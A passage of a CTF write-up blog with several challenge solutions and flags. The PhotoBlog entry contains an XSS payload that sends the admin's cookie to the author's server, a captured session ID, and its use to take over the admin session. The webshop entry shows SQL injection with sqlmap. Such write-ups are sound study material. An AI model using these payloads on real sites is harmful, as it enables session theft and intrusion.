<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiv4uj0ZGqiIdgw-gt8DMVD91LtGCRzz6wOKhQiRAybKcizdtdwpUu0c8PRYtwXxeMY9SD2xoQqJbEgv09zLfF4V-SOUmbmPnpt0TFKSVeS5-HQnJu7vROiiQj0BrTAdXgWK1Db_r5rLP9/s1600/8.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="95" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiv4uj0ZGqiIdgw-gt8DMVD91LtGCRzz6wOKhQiRAybKcizdtdwpUu0c8PRYtwXxeMY9SD2xoQqJbEgv09zLfF4V-SOUmbmPnpt0TFKSVeS5-HQnJu7vROiiQj0BrTAdXgWK1Db_r5rLP9/s400/8.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
7. select value from tuctf_info</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2ELHKyMC_HTEGiJvRrbgnfTRKDyrIg5mRMED-JaLnOdRwg22nXjVkBa4CNMNHfuUBxJebfevtQHsJSrRehk6sOSXsDDmmFO66Ls17O2oTkryZ3vCo_vFtkUwKidwoYjx9Y_JqK4KVmZMw/s1600/9.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="86" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2ELHKyMC_HTEGiJvRrbgnfTRKDyrIg5mRMED-JaLnOdRwg22nXjVkBa4CNMNHfuUBxJebfevtQHsJSrRehk6sOSXsDDmmFO66Ls17O2oTkryZ3vCo_vFtkUwKidwoYjx9Y_JqK4KVmZMw/s400/9.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Python Script:</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
<script src="https://gist.github.com/icheernoom/1a388a49510a67b9a4b8a5ec1d89b08d.js"></script></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Flag:</b> <b><span style="color: red;">TUCTF{v4ccinate_y0ur_databa5e5}</span></b></div>
ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com0tag:blogger.com,1999:blog-9154377361493966397.post-63867639845270446232016-02-22T16:41:00.001+07:002016-02-22T16:41:55.704+07:00Internetwache CTF 2016: It's Prime Time! (Code) Write-up<b>Description:</b><br />
<blockquote class="tr_bq">
We all know that prime numbers are quite important in cryptography. Can you help me to find some?</blockquote>
<b>Solution: </b><br />
<br />
<script src="https://gist.github.com/icheernoom/6bf8b66d7afc9a53e7c5.js"></script>
<br />
<b>Flag:</b> <b><span style="color: red;">IW{Pr1m3s_4r3_!mp0rt4nt}</span></b>ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com0tag:blogger.com,1999:blog-9154377361493966397.post-35992414380725102752016-02-22T16:30:00.000+07:002016-02-22T16:30:27.955+07:00Internetwache CTF 2016: A numbers game (Code) Write-up<b>Description:</b><br />
<blockquote class="tr_bq">
People either love or hate math. Do you love it? Prove it! You just need to solve a bunch of equations without a mistake.</blockquote>
<b>Solution: </b><br /><br />
<script src="https://gist.github.com/icheernoom/fb0008e22932edca42bf.js"></script>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWq8obTalOQSpXWLFmNqZ7wisRbmdkaoopBHD-vPSaPAWZlCLgtR8xuBfPY-wPYsNgEt8d6eT4Di3EYqoeX_ExmRgx7vQI-shOQX_O6M-ZQMsUsSFIqLudHEnslaE2jS0cGirwWC080UhB/s1600/12728958_10205830437545482_6058617821005961113_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="276" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWq8obTalOQSpXWLFmNqZ7wisRbmdkaoopBHD-vPSaPAWZlCLgtR8xuBfPY-wPYsNgEt8d6eT4Di3EYqoeX_ExmRgx7vQI-shOQX_O6M-ZQMsUsSFIqLudHEnslaE2jS0cGirwWC080UhB/s400/12728958_10205830437545482_6058617821005961113_n.jpg" width="400" /></a></div>
<br />
<b>Flag:</b> <b><span style="color: red;">IW{M4TH_1S_34SY}</span></b>ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com0tag:blogger.com,1999:blog-9154377361493966397.post-8606762805057341522016-02-07T01:32:00.000+07:002016-02-10T23:55:48.193+07:00Sharif CTF 2016: PhotoBlog (Web) Write-up<b>Description:</b><br />
<blockquote class="tr_bq">
A friend of mine have stolen my cat's picture on his blog. I want to login as admin user on his blog. Do you have any idea? The Blog</blockquote>
<b>Solution:</b><br />
<br />
1. Access to the blog, Found input field (user, comment, captcha) and user, comment are vulnerable to <a href="https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)">Cross-site Scripting (XSS)</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_rVDbGW-981uAZI0HPVHhEkU1a8PoyaGhrA86GEBH7Pg3OnTGUnVmGcjY6smZx_9hBEWFXw1ka096XCIKIpR-UMuiFmuoaW4dQq6Zh8zkPqYGEDNWs7Xx7rDAkphECNgH5ga2bt6IVfJU/s1600/blog.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_rVDbGW-981uAZI0HPVHhEkU1a8PoyaGhrA86GEBH7Pg3OnTGUnVmGcjY6smZx_9hBEWFXw1ka096XCIKIpR-UMuiFmuoaW4dQq6Zh8zkPqYGEDNWs7Xx7rDAkphECNgH5ga2bt6IVfJU/s1600/blog.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
2. Description tell me "want to login as admin", I custom JavaScript to steal a admin's cookie and put to comment.</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<pre class="brush:[php];"><script>new Image().src = 'http://www.my.site/icheernoom.php?cookies=' + encodeURI(document.cookie);</script></pre>
<br />
3. Wait a minute and give some cookie in my site's access log.<br />
<pre class="brush:[php];">/icheernoom.php?cookies=PHPSESSID=515386866780b5f132fc96c02b3ddb82</pre>
<br />
4. "Login as admin", I guess the admin page is /admin.php found it and redirect to /login.php, Try to access with a admin's cookie<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkd7EENl7nYRdjjkGE0yryIyPzmgsUAWMB6-Zpdsbx8jOxfGObZhaXA8X-g8iF54oyszmuII0YlSOYjQ8RtRBVKVphtA4_6WCZ54GGWrrE4-ezHY0UttZ42tus5-6DUs_ZyA19Zq2etfHW/s1600/burp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="159" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkd7EENl7nYRdjjkGE0yryIyPzmgsUAWMB6-Zpdsbx8jOxfGObZhaXA8X-g8iF54oyszmuII0YlSOYjQ8RtRBVKVphtA4_6WCZ54GGWrrE4-ezHY0UttZ42tus5-6DUs_ZyA19Zq2etfHW/s400/burp.png" width="400" /></a></div>
<br />
<b>Flag:</b> <b><span style="color: red;">1b7a60600d5731739c0e2115bd4ebf7c</span></b>ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com0tag:blogger.com,1999:blog-9154377361493966397.post-9216347449487707772015-11-21T17:36:00.000+07:002015-11-23T11:52:42.137+07:00Hack Dat Kiwi 2015: Phone Lock (Web) Write-up<b>Description:</b><br />
<blockquote class="tr_bq">
A friend of mine forgot her phone password. I told her you're the hacker! Go get 'em tiger.</blockquote>
<b>Solution:</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjU9zVQQEX7cnU0YOVSo5Y_41JYckismjlRyJYhcARPXdnTtyGErTQ7ZLjx1Kb0zH1A7OA0eNZ6PEUjEGW8qUwUKPLz3gaO73Pt4cNxlyOIDsaiTmIBaClRuhoqW2fz7CmzVJT4ZPoSLMLa/s1600/phone.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjU9zVQQEX7cnU0YOVSo5Y_41JYckismjlRyJYhcARPXdnTtyGErTQ7ZLjx1Kb0zH1A7OA0eNZ6PEUjEGW8qUwUKPLz3gaO73Pt4cNxlyOIDsaiTmIBaClRuhoqW2fz7CmzVJT4ZPoSLMLa/s320/phone.png" width="269" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhk54lHVSMKq3xNTNytKpIW6ivn9kh18YQIOZ1A9p9E7DceFTAK1LnU-_Sz-tdnVpIb-a4cIgFFmQt3aBToHFf6O_C28-6RqQQchLQGBBb8zYF4b6jA9KD38FkdwbPo-Z1ouso-7nF8RsvR/s1600/js.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="182" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhk54lHVSMKq3xNTNytKpIW6ivn9kh18YQIOZ1A9p9E7DceFTAK1LnU-_Sz-tdnVpIb-a4cIgFFmQt3aBToHFf6O_C28-6RqQQchLQGBBb8zYF4b6jA9KD38FkdwbPo-Z1ouso-7nF8RsvR/s320/js.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
It use Javascript to validate and I just write a python script to solve this below.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<script src="https://gist.github.com/icheernoom/8efbb4a05e02d5e4dfff.js"></script>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTFKGB_dSqEHuqOpRkzeHAwR_wmuDKyT7viPdb7dLNY9LhBfdG565VpQ98uaVkId8qlFQIyU7hvtyOITGSwGgz6enzY8FPwv3qkA4JbigEJMF7ISvp1NYAkHoqRkOkZotJJXvFLpVE_K5V/s1600/flag.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTFKGB_dSqEHuqOpRkzeHAwR_wmuDKyT7viPdb7dLNY9LhBfdG565VpQ98uaVkId8qlFQIyU7hvtyOITGSwGgz6enzY8FPwv3qkA4JbigEJMF7ISvp1NYAkHoqRkOkZotJJXvFLpVE_K5V/s320/flag.png" width="276" /></a></div>
<br />
<b>Flag:</b> <b><span style="color: red;">98635f80048b8abbd71e9bb55958a6c8</span></b>ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com0tag:blogger.com,1999:blog-9154377361493966397.post-2357082599876792202015-11-04T20:21:00.002+07:002015-11-04T20:21:14.929+07:00School CTF 2015: Meaningless Text (Stegano) Write-up<b>Description:</b><br />
<blockquote class="tr_bq">
It is absolutely meaningless <a href="http://school-ctf.org/files/task12_5b01f6a519d9a567ca098416e1499f8464e10c0c.html">text</a>, isn't it?</blockquote>
<b>Solution: </b><br />
<b><br /></b>
1. View-source in page, I think it just a pattern in <em></em> tag and get some word like <b>"flag is not this line but you think right way"</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUnQ3DygIbcgKz-8gSwgs2No97A7dpvboefmJkfFyP5wES1aywImboy8JKwCEM4toQpImp1g-hcSsTKtesqZAelSAND870qA6EmxSU7rEklIya-R1IkzCCLJFB8UjX2n5oWCn32wjz1Gdh/s1600/txt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUnQ3DygIbcgKz-8gSwgs2No97A7dpvboefmJkfFyP5wES1aywImboy8JKwCEM4toQpImp1g-hcSsTKtesqZAelSAND870qA6EmxSU7rEklIya-R1IkzCCLJFB8UjX2n5oWCn32wjz1Gdh/s400/txt.png" width="400" /></a></div>
<br />
2. View-source again and look at <e></e> tag, It have <e>one</e> and <e>zero</e>, yeah it is binary!!<br />
<br />
3. Write a python script to solve this below.<br />
<br />
<script src="https://gist.github.com/icheernoom/6a1a8118ed5ccdf6ce45.js"></script>
Good job. :D
<br />
<br />
<b>Flag:</b> <b><span style="color: red;">flag_is_this_is_a_simple_stego</span></b>ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com0tag:blogger.com,1999:blog-9154377361493966397.post-70480013583957764772015-11-04T20:21:00.001+07:002015-11-04T23:30:13.222+07:00School CTF 2015: Cipollino, little onion (Admin) Write-up<b>Description:</b><br />
<div>
<blockquote class="tr_bq">
Do you like containers as we do?</blockquote>
<b>Solution: </b><br />
<b><br /></b>
1. Rename an extension from jpg to rar.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieSFirhvUDEtR2g79DCIYQWaVXU8W6Mq4SaVHACpALvGPvDcBqwGtANWYrUUzMu9ONvKWNpyXn9VrN-TvnuScSXVDhyT8T9hUS2I5-Pq7IIMw67QpwEVPES-2mjfNN1eZLO0LTegjmJdWV/s1600/image_1cfb4379b82626f0b5d28129ddb5918f8c010aa8.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieSFirhvUDEtR2g79DCIYQWaVXU8W6Mq4SaVHACpALvGPvDcBqwGtANWYrUUzMu9ONvKWNpyXn9VrN-TvnuScSXVDhyT8T9hUS2I5-Pq7IIMw67QpwEVPES-2mjfNN1eZLO0LTegjmJdWV/s320/image_1cfb4379b82626f0b5d28129ddb5918f8c010aa8.jpg" width="320" /></a></div>
<br />
<br />
2. Get a QRCode.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX8eNPZuSkuZgDrY_FG-Dq1XefrmWTVpf3uDSXUaT_tr-8PPTFGAtstEWtQi3kTNuLhO1jr-AGFzsRiG6ygM8MpF7FHiH-C1wgTcZgXKIeBNOJSupXc7DnD4UV_-f1RVHwR-1Wx4icu1U7/s1600/6.qrcode.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiX8eNPZuSkuZgDrY_FG-Dq1XefrmWTVpf3uDSXUaT_tr-8PPTFGAtstEWtQi3kTNuLhO1jr-AGFzsRiG6ygM8MpF7FHiH-C1wgTcZgXKIeBNOJSupXc7DnD4UV_-f1RVHwR-1Wx4icu1U7/s320/6.qrcode.png" width="320" /></a></div>
<br />
<br />
3. Decode QRCode in <a href="https://zxing.org/w/decode.jspx">https://zxing.org/w/decode.jspx</a>, get a c++ code.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIf-cRYwAPGzIfzTF03KJLQCG1sb2u1l5Aygo7e93-z91iL5Mp8m7-LvY-blKNNoWUD7Txt0ZdQO1WxlN-2hcIJtHxLU51iGuVqg4OkbHj1ZcWDmwwe_o2yKhDHcC4gN_x-_bMZGVPWe2V/s1600/decodec%252B%252B.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="276" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIf-cRYwAPGzIfzTF03KJLQCG1sb2u1l5Aygo7e93-z91iL5Mp8m7-LvY-blKNNoWUD7Txt0ZdQO1WxlN-2hcIJtHxLU51iGuVqg4OkbHj1ZcWDmwwe_o2yKhDHcC4gN_x-_bMZGVPWe2V/s400/decodec%252B%252B.png" width="400" /></a></div>
<br />
4. Compile and run in <a href="http://www.tutorialspoint.com/compile_cpp_online.php">http://www.tutorialspoint.com/compile_cpp_online.php</a><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBsspsUef0Kl94LQbz9VU-BygPeHbO40M_JNxsYV5r-O4lXe7HGHTyTcMfPYXdO5kkY1ilHEVqbmumSyCw-vZaZ_GvaaeAbesxbJnvTdRkXT7NyH8NX3qwhMPTZroRi_BVdSF9WVSibaza/s1600/compile_run.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="277" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBsspsUef0Kl94LQbz9VU-BygPeHbO40M_JNxsYV5r-O4lXe7HGHTyTcMfPYXdO5kkY1ilHEVqbmumSyCw-vZaZ_GvaaeAbesxbJnvTdRkXT7NyH8NX3qwhMPTZroRi_BVdSF9WVSibaza/s400/compile_run.png" width="400" /></a></div>
<br />
5. Replace ", " to space and replace "0x" to space, get a hex and decode it got a base64.<br />
<br />
4236342759534139494363334d4341334e6941324e5341334d5341354e5341334d5341304f4341324f4341354e5341324f4341324e5341334e7941334f4341354e5341324e6941344d6941304f4341354e5341344e5341354e5341344d6941354e5341344d7941304f4341354e5341324e7941304f4341304f4341334e6941354e5341324f4341324f5341324e7941344d6941344f5341344d4341344e4341334f5341344d69634b436d3168637a316258516f4b6257467a50574575633342736158516f4a79416e4b516f4b5a6d397949476b6761573467636d46755a32556f624756754b47316863796b704f676f4a596a3170626e516f6257467a57326c644b516f4a597a316f5a58676f59696b4b43584279615735304b474d73494756755a44306e4943637043677077636d6c756443676e4a796b3d27<br />
<br />
B64'YSA9ICc3MCA3NiA2NSA3MSA5NSA3MSA0OCA2OCA5NSA2OCA2NSA3NyA3OCA5NSA2NiA4MiA0OCA5NSA4NSA5NSA4MiA5NSA4MyA0OCA5NSA2NyA0OCA0OCA3NiA5NSA2OCA2OSA2NyA4MiA4OSA4MCA4NCA3OSA4MicKCm1hcz1bXQoKbWFzPWEuc3BsaXQoJyAnKQoKZm9yIGkgaW4gcmFuZ2UobGVuKG1hcykpOgoJYj1pbnQobWFzW2ldKQoJYz1oZXgoYikKCXByaW50KGMsIGVuZD0nICcpCgpwcmludCgnJyk='<br />
<br />
6. Base64 Decode and get python code and run it.<br />
<br />
a = '70 76 65 71 95 71 48 68 95 68 65 77 78 95 66 82 48 95 85 95 82 95 83 48 95 67 48 48 76 95 68 69 67 82 89 80 84 79 82'<br />
<br />
mas=[]<br />
<br />
mas=a.split(' ')<br />
<br />
for i in range(len(mas)):<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>b=int(mas[i])<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>c=hex(b)<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>print(c, end=' ')<br />
<br />
print('')<br />
<br />
7. Result from python code.<br />
<br />
0x46 0x4c 0x41 0x47 0x5f 0x47 0x30 0x44 0x5f 0x44 0x41 0x4d 0x4e 0x5f 0x42 0x52 0x30 0x5f 0x55 0x5f 0x52 0x5f 0x53 0x30 0x5f 0x43 0x30 0x30 0x4c 0x5f 0x44 0x45 0x43 0x52 0x59 0x50 0x54 0x4f 0x52<br />
<br />
8. HEX Decoding.<br />
<br />
464c41475f4730445f44414d4e5f4252305f555f525f53305f4330304c5f444543525950544f52<br />
<br />
<b>Flag:</b> <b><span style="color: red;">FLAG_G0D_DAMN_BR0_U_R_S0_C00L_DECRYPTOR</span></b><br />
<div>
<b><br /></b></div>
</div>
ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com0tag:blogger.com,1999:blog-9154377361493966397.post-79793936479773934012015-11-04T20:21:00.000+07:002015-11-04T23:24:53.173+07:00School CTF 2015: Hunger games (Web) Write-up<b>Description:</b><br />
<blockquote class="tr_bq">
Oh, that monkey is really annoying, can you feed it please?</blockquote>
<b>Solution: </b><br />
<b><br /></b>
1. A monkey want banana, but in a choice not have banana.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixW9FcBWlbdAGH0csLpW-6KPG967fbJfwZqtjo5dTODL-LI-J-veMHcoGv_9pOdvIDZq2iXBCVmAH4QZrbsqBHwYLkk-EZqTakOh7Kml13ivBR8rmQTf76HW_qoQ3MBtlejtCUfI_o2SAx/s1600/banana1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="165" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixW9FcBWlbdAGH0csLpW-6KPG967fbJfwZqtjo5dTODL-LI-J-veMHcoGv_9pOdvIDZq2iXBCVmAH4QZrbsqBHwYLkk-EZqTakOh7Kml13ivBR8rmQTf76HW_qoQ3MBtlejtCUfI_o2SAx/s400/banana1.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
2. Send banana to monkey by <a href="https://portswigger.net/burp/">Burp Suite</a>. :3</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbfRFNhTb2gDwqtvS8bcFVUY0wnBiP3dqO356bEp_7vpAUulEiED8ZYELvl_ox9nRJjghKHRDk5yKEkCN8LgGEjKDC2E_XmY9Mr00VJYqJbaOcN2E9NsQEsDB70MpsGw2vWN85_fr4jpXl/s1600/sendbanana.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="167" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbfRFNhTb2gDwqtvS8bcFVUY0wnBiP3dqO356bEp_7vpAUulEiED8ZYELvl_ox9nRJjghKHRDk5yKEkCN8LgGEjKDC2E_XmY9Mr00VJYqJbaOcN2E9NsQEsDB70MpsGw2vWN85_fr4jpXl/s400/sendbanana.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Flag:</b> <b><span style="color: red;">l375_$7ar7_w3b_h4ck5</span></b></div>
ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com0tag:blogger.com,1999:blog-9154377361493966397.post-13031007914887539942015-10-25T20:05:00.001+07:002015-10-25T20:05:11.636+07:00TUM CTF Teaser: webshop (Web) Write-up<b>Description:</b><br />
<blockquote class="tr_bq">
Well, I found this shop and their offers are quite awesome, but something here smells... fishy. 1.ctf.link:1124</blockquote>
<b>Solution: </b><br />
<b><br /></b>
1. Access to <a href="http://1.ctf.link:1124/">http://1.ctf.link:1124</a> and look around, I found this site use free web template from freewebsitetemplates.com<br />
<br />
2. Try view-source to find something interest but not found, I think it just a static website.<br />
<br />
3. Found interest in search form that action to search.php.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCHJ-5JuxLjea_S1C1L2sMiGuRbtAUOb6PURXKZsgkNy2ibnM-DV6oKFqKpnqLT-zVcWkBk370KgZzLjEhGdtUGBymX2kEE6QDJwNHML-uhi5FHJ-mupwBtXyII25_PELj4mO4UdrvFh3x/s1600/search1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="224" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCHJ-5JuxLjea_S1C1L2sMiGuRbtAUOb6PURXKZsgkNy2ibnM-DV6oKFqKpnqLT-zVcWkBk370KgZzLjEhGdtUGBymX2kEE6QDJwNHML-uhi5FHJ-mupwBtXyII25_PELj4mO4UdrvFh3x/s400/search1.PNG" width="400" /></a></div>
<br />
<br />
4. It should be have a <b>name="search"</b> right? , but It have <b>value="search"</b> only.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkE4tBBgfG0CerDZwN-eD2RureOLfbz8Zz5usFE8u_uFsvhTNCbL63xXGgGLySObecDLJpie-0CwRbkvJi9rK2Zl5AiQNvV6-A9d7eUabsQKfTkGt1LLuiBhiFcgXioX0yuzJ6H9MFpvOs/s1600/source.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="125" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkE4tBBgfG0CerDZwN-eD2RureOLfbz8Zz5usFE8u_uFsvhTNCbL63xXGgGLySObecDLJpie-0CwRbkvJi9rK2Zl5AiQNvV6-A9d7eUabsQKfTkGt1LLuiBhiFcgXioX0yuzJ6H9MFpvOs/s400/source.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
5. Try to search and intercept request with <a href="https://portswigger.net/burp/">Burp Suite</a>, not found a value that I input to search. :)</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCiFo_7wyB84Ztyxv0HAsooJuAQwL7LOcFPdnvOUY6giHA2ys5PB7Sdhe5pTjSB0Gn47W3umTBdYoV6vpbH6ajIqnp24MnidVBNzdDN9MQkdf_GOZlPllFd0dsdqwgHQ4j59NcD3Ry2FMv/s1600/burp.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="264" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCiFo_7wyB84Ztyxv0HAsooJuAQwL7LOcFPdnvOUY6giHA2ys5PB7Sdhe5pTjSB0Gn47W3umTBdYoV6vpbH6ajIqnp24MnidVBNzdDN9MQkdf_GOZlPllFd0dsdqwgHQ4j59NcD3Ry2FMv/s400/burp.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
6. Add <b>search</b> parameter to post request and copy all line to webshop.txt</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2dvLUkqW3jtC9CV1v3v1ptxvAyAqtGoCHDQEPUPYETISz17Zlaf65EYclYuFstnvMLObpWobXiZ7GgfSa48p1GPh47wdN6XUseI0AYLVhXmIQ-mAYbPI2UcGFBuT9fN9c_iuNMvAParfH/s1600/search.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2dvLUkqW3jtC9CV1v3v1ptxvAyAqtGoCHDQEPUPYETISz17Zlaf65EYclYuFstnvMLObpWobXiZ7GgfSa48p1GPh47wdN6XUseI0AYLVhXmIQ-mAYbPI2UcGFBuT9fN9c_iuNMvAParfH/s400/search.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
7. Using <a href="http://sqlmap.org/">sqlmap</a> and -r option to Load HTTP request from a file and set -p "search" for inject to search parameter.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvPZY6cIiKBqmB07ssqZtK7tlUkJMZ2kXJbx2Xpv4GLLA1vl6V2fbycAQtgBX7CZn-RVKBnZDDP56hYOPZXPuEOjV1WsWqUrPHgr8ccWSpg_elJhWbogIdHU0NOJGCmO5np_2SKAUp9cOX/s1600/sqlmap1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvPZY6cIiKBqmB07ssqZtK7tlUkJMZ2kXJbx2Xpv4GLLA1vl6V2fbycAQtgBX7CZn-RVKBnZDDP56hYOPZXPuEOjV1WsWqUrPHgr8ccWSpg_elJhWbogIdHU0NOJGCmO5np_2SKAUp9cOX/s320/sqlmap1.PNG" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
8. SQL Injection vulnerability found in search parameter!! try to find tables, columns, dump data and get the flag!</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
